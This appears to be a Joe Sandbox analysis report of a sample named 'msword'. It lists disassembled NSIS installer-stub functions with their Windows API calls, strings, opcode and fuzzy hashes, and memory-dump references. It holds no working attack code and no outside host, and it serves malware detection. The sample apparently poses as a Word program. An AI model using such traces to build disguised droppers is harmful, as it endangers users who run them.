Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Rename failed: %s, xrefs: 0040194B
CreateDirectory: "%s" (%d), xrefs: 004017BF
Jump: %d, xrefs: 00401602
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
detailprint: %s, xrefs: 00401679
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
Rename on reboot: %s, xrefs: 00401943
Aborting: "%s", xrefs: 0040161D
CreateDirectory: "%s" created, xrefs: 00401849
SetFileAttributes: "%s":%08X, xrefs: 0040177B
SetFileAttributes failed., xrefs: 004017A1
BringToFront, xrefs: 004016BD
Rename: %s, xrefs: 004018F8
Call: %d, xrefs: 0040165A
Sleep(%d), xrefs: 0040169D

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00405972
RichEdit20A, xrefs: 00405BB6, 00405BBB
@%F, xrefs: 004059F6
RichEd32, xrefs: 00405BA8
RichEd20, xrefs: 00405B9D
B%F, xrefs: 00405A1F
@rD, xrefs: 00405965
RichEdit, xrefs: 00405BC4
_Nb, xrefs: 00405AD1
.exe, xrefs: 00405A3D
.DEFAULT\Control Panel\International, xrefs: 00405999

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,WarsFeltMadridFarmsPee,WarsFeltMadridFarmsPee,00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: error, user retry, xrefs: 00401B40
File: error creating "%s", xrefs: 00401AF0
WarsFeltMadridFarmsPee, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user cancel, xrefs: 00401B93
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user abort, xrefs: 00401B53

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$WarsFeltMadridFarmsPee
API String ID: 4286501637-4051260161
Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Inst, xrefs: 0040366C
soft, xrefs: 00403675
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
Error launching installer, xrefs: 004035D7
Null, xrefs: 0040367E

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

X1C, xrefs: 0040343C
P1B, xrefs: 004033A9
... %d%%, xrefs: 0040349E
X1C, xrefs: 004033ED

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(00641E30), ref: 00402387

Strings

Exch: stack < %d elements, xrefs: 00401ED8
WarsFeltMadridFarmsPee, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$WarsFeltMadridFarmsPee
API String ID: 1459762280-1231270740
Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(00641E30), ref: 00402387

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
